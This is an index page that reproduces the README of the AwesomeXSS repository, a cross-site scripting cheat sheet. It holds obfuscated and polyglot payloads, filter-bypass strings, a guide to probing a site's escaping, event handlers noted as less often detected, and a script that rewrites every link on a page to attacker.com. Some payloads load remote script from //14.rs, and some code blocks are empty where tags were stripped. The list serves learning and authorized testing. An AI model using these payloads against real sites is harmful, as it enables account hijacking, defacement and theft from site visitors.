Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/s0md3v/AwesomeXSS
Awesome XSS stuff
https://github.com/s0md3v/AwesomeXSS
List: AwesomeXSS
payload payload-list xss xss-cheatsheet xss-detection xss-payloads
Last synced: 1 day ago
JSON representation
Awesome XSS stuff
- Host: GitHub
- URL: https://github.com/s0md3v/AwesomeXSS
- Owner: s0md3v
- License: mit
- Created: 2018-03-11T14:35:30.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2024-04-23T09:21:44.000Z (6 months ago)
- Last Synced: 2024-10-29T15:10:44.754Z (5 days ago)
- Topics: payload, payload-list, xss, xss-cheatsheet, xss-detection, xss-payloads
- Language: JavaScript
- Size: 3.48 MB
- Stars: 4,774
- Watchers: 239
- Forks: 765
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-web-security - AwesomeXSS - Written by [@s0md3v](https://github.com/s0md3v). (Introduction / XSS - Cross-Site Scripting)
- qazbnm456-awesome-web-security - AwesomeXSS - Written by [@s0md3v](https://github.com/s0md3v). (Introduction / XSS - Cross-Site Scripting)
- awesome-security-collection - **2759**星
- awesome-hacking-lists - s0md3v/AwesomeXSS - Awesome XSS stuff (JavaScript)
README
# AwesomeXSS
This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.
### Awesome contents
- [Challenges](https://github.com/s0md3v/AwesomeXSS#awesome-challenges)
- [Reads & Presentations](https://github.com/s0md3v/AwesomeXSS#awesome-reads--presentations)
- [Tools](https://github.com/s0md3v/AwesomeXSS#awesome-tools)
- [Mind maps](https://github.com/s0md3v/AwesomeXSS#awesome-xss-mind-maps)
- [DOM XSS](https://github.com/s0md3v/AwesomeXSS#awesome-dom-xss)
- [Payloads](https://github.com/s0md3v/AwesomeXSS#awesome-payloads)
- [Polyglots](https://github.com/s0md3v/AwesomeXSS#awesome-polyglots)
- [Tags and event handlers](https://github.com/s0md3v/AwesomeXSS#awesome-tags--event-handlers)
- [Context breaking](https://github.com/s0md3v/AwesomeXSS#awesome-context-breaking)
- [HTML context](https://github.com/s0md3v/AwesomeXSS#html-context)
- [Attribute context](https://github.com/s0md3v/AwesomeXSS#attribute-context)
- [JavaScript context](https://github.com/s0md3v/AwesomeXSS#javascript-context)
- [Confirm Variants](https://github.com/s0md3v/AwesomeXSS#awesome-confirm-variants)
- [Exploits](https://github.com/s0md3v/AwesomeXSS#awesome-exploits)
- [Probing](https://github.com/s0md3v/AwesomeXSS#awesome-probing)
- [Bypassing](https://github.com/s0md3v/AwesomeXSS#awesome-bypassing)
- [Encoding](https://github.com/s0md3v/AwesomeXSS#awesome-encoding)
- [Tips & tricks](https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks)
### Awesome Challenges
- [prompt.ml](https://prompt.ml)
- [alf.nu/alert1](https://alf.nu/alert1)
- [xss-game.appspot.com](https://xss-game.appspot.com)
- [polyglot.innerht.ml](https://polyglot.innerht.ml)
- [sudo.co.il/xss](http://sudo.co.il/xss)
- [root-me.org](https://www.root-me.org/?page=recherche&lang=en&recherche=xss)
- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)
- [wechall.net](https://www.wechall.net/challs/XSS)
- [codelatte.id/labs/xss](https://codelatte.id/labs/xss)
### Awesome Reads & Presentations
- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)
- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)
- [Copy Pest](https://www.slideshare.net/x00mario/copypest)
### Awesome Tools
- [XSStrike](https://github.com/UltimateHackers/XSStrike)
- [BeEF](https://github.com/beefproject/beef)
- [JShell](https://github.com/UltimateHackers/JShell)
### Awesome XSS Mind Maps
A beautiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)
### Awesome DOM XSS
- Does your input go into a sink? `Vulnerable`
- It doesn't? `Not vulnerable`
**Source**: An input that could be controlled by an external (untrusted) source.
```
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
```
**Sink**: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.
```
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
```
This comprehensive list of sinks and source is taken from [domxsswiki](https://github.com/wisec/domxsswiki).
### Awesome Payloads
```
z
[confirm``]"<">z
z
/*<script* */prompt()"/ondblclick=`<`[confir\u006d``]>z
click
click
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``
(_=prompt,_(1)) "">
<embed src=//14.rs>
<script x=">" src=//15.rs>
x
```
### Awesome Polyglots
Here's an XSS polyglot that I made which can break out of 20+ contexts:
```
%0ajavascript:`/*\"/*--><svg onload='/*`
```
Explanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)
### Awesome Tags & Event Handlers
- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)
Some less detected event handlers
```
ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel
```
Some HTML Tags that you will be using
```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```
### Awesome Context Breaking
#### HTML Context
Case: `You searched for $input. `
```
```
#### Attribute Context
Case: ``
```
">
"> var new something = '$input'; `
```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
```
### Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
```
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
```
### Awesome Exploits
##### Replace all links
```javascript
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
i.href = "https://attacker.com";
});
```
##### Source Code Stealer
```html
```
### Awesome Probing
If nothing of this works, take a look at **Awesome Bypassing** section
First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about number and contexts of reflections.
Now for attribute context, check if double quotes (") are being filtered by entering `x"d3v`. If it gets altered to `x"d3v`, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`, if it gets altered to `x'`, you are doomed. The only thing you can try is encoding.
If the quotes are not being filtered, you can simply try payloads from **Awesome Context Breaking** section.
For javascript context, check which quotes are being used for example if they are doing
```
variable = 'value' or variable = "value"
```
Now lets say single quotes (') are in use, in that case enter `x'd3v`. If it gets altered to `x\'d3v`, try escaping the backslash (\) by adding a backslash to your probe i.e. `x\'d3v`. If it works use the following payload:
```
\'-alert()//
```
But if it gets altered to `x\\\'d3v`, the only thing you can try is closing the script tag itself by using
```
```
For simple HTML context, the probe is `x`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `<` and `>`. It can simply bypassed using
```
```
### Awesome Bypassing
**Note:** None of these payloads use single (') or double quotes (").
- Without event handlers
```
confirm()
```
- Without space
```
```
- Without slash (/)
```
```
- Without equal sign (=)
```
confirm()
```
- Without closing angular bracket (>)
```
```
- Without a Valid HTML tag
```
click here
drag it
```
- Bypass tag blacklisting
```
```
### Awesome Encoding
|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|
|----|----|-------|-----------|----|--------|----------|---|
|`"`|"|`"`|quotation mark|u+0022|\0022|\42|%22|
|`#`|#|`#`|number sign|u+0023|\0023|\43|%23|
|`$`|$|`$`|dollar sign|u+0024|\0024|\44|%24|
|`%`|%|`%`|percent sign|u+0025|\0025|\45|%25|
|`&`|&|`&`|ampersand|u+0026|\0026|\46|%26|
|`'`|'|`'`|apostrophe|u+0027|\0027|\47|%27|
|`(`|(|`(`|left parenthesis|u+0028|\0028|\50|%28|
|`)`|)|`)`|right parenthesis|u+0029|\0029|\51|%29|
|`*`|*|`*`|asterisk|u+002A|\002a|\52|%2A|
|`+`|+|`+`|plus sign|u+002B|\002b|\53|%2B|
|`,`|,|`,`|comma|u+002C|\002c|\54|%2C|
|`−`|-|`-`|hyphen-minus|u+002D|\002d|\55|%2D|
|`.`|.|`.`|full stop; period|u+002E|\002e|\56|%2E|
|`/`|/|`/`|solidus; slash|u+002F|\002f|\57|%2F|
|`:`|:|`:`|colon|u+003A|\003a|\72|%3A|
|`;`|;|`;`|semicolon|u+003B|\003b|\73|%3B|
|`<`|<|`<`|less-than|u+003C|\003c|\74|%3C|
|`=`|=|`=`|equals|u+003D|\003d|\75|%3D|
|`>`|>|`>`|greater-than sign|u+003E|\003e|\76|%3E|
|`?`|?|`?`|question mark|u+003F|\003f|\77|%3F|
|`@`|@|`@`|at sign; commercial at|u+0040|\0040|\100|%40|
|`[`|\[|`[`|left square bracket|u+005B|\005b|\133|%5B|
|`\`|\|`\`|backslash|u+005C|\005c|\134|%5C|
|`]`|]|`]`|right square bracket|u+005D|\005d|\135|%5D|
|`^`|^|`^`|circumflex accent|u+005E|\005e|\136|%5E|
|`_`|_|`_`|low line|u+005F|\005f|\137|%5F|
|```|\`|```|grave accent|u+0060|\0060|\u0060|%60|
|`{`|{|`{`|left curly bracket|u+007b|\007b|\173|%7b|
|`|`|\||`|`|vertical bar|u+007c|\007c|\174|%7c|
|`}`|}|`}`|right curly bracket|u+007d|\007d|\175|%7d|
### Awesome Tips & Tricks
- `http(s)://` can be shortened to `//` or `/\\` or `\\`.
- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`
- You can use `//` to close a tag instead of `>`.
- I have found that `confirm` is the least detected pop-up function so stop using `alert`.
- Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use `` instead of `<script src="//14.rs">`
- The shortest HTML context XSS payload is `<script src=//14.rs>` (19 chars)
### Awesome Credits
All the payloads are crafted by me unless specified.